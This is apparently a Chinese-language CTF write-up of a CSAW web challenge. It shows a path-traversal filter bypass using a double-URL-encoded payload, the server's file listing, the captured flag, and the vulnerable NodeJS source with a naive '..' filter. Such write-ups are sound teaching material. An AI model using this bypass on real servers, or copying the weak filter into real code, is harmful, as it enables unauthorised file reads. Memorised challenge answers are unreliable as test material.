題目資訊

I wrote a little proxy program in NodeJS for my poems folder.

Everyone wants to read flag.txt but I like it too much to share.

http://web.chal.csaw.io:7311/?path=orange.txt

解法

先試試 http://web.chal.csaw.io:7311/?path=

Directory listing for /poems/
burger.txt
haiku.txt
orange.txt
ppp.txt
the_red_wheelbarrow.txt

可以看到在 poems 資料夾內的所有檔案。

再來試試 http://web.chal.csaw.io:7311/?path=../

1	WHOA THATS BANNED!!!!

知道應該是過慮了 ..，嘗試了許久，連全形 N（ＮＮ）都試過了，最後終於發現可以用 double URL encoding 的 payload（參考：OWASP Testing Directory traversal）

Double URL encoding: . => %2e => %252e
嘗試 http://web.chal.csaw.io:7311/?path=.%252e/

Directory listing for /poems/../
.dockerignore
back.py
flag.txt
poems/
serve.sh
server.js

連上 http://web.chal.csaw.io:7311/?path=.%252e/flag.txt 拿到 flag

Flag: flag{thank_you_based_orange_for_this_ctf_challenge}

後記

順便把 server.js 撈了出來以供研究，結果發現居然有擋ＮＮ XDD
不愧是 orange ，自己研究出的東西自己擋掉 XDD

var http = require('http');
var fs = require('fs');
var url = require('url');
var server = http.createServer(function(req, res) {
    try {
        var path = url.parse(req.url, true).query;
        path = path['path'];
        if (path.indexOf("..") == -1 && path.indexOf("ＮＮ") == -1) {
            var base = "http://localhost:8080/poems/";
            var callback = function(response){
                var str = '';
                response.on('data', function (chunk) {
                    str += chunk;
                });
                response.on('end', function () {
                  res.end(str);
                });
            }
            http.get(base + path, callback).end();
        } else {
            res.writeHead(403);
            res.end("WHOA THATS BANNED!!!!");
        }
    }
    catch (e) {
        res.writeHead(404);
        res.end('Oops');
    }
});
server.listen(9999);

附註

解題中找到了一個不錯的工具跟 wordlist
Wfuzz - The Web fuzzer 官網
 Wfuzz Github
Wfuzz wordlist
最後把 wordlist/vulns/cgis.txt 裡的東西拿來試試看，終於解出來了~
覺得感動QwQ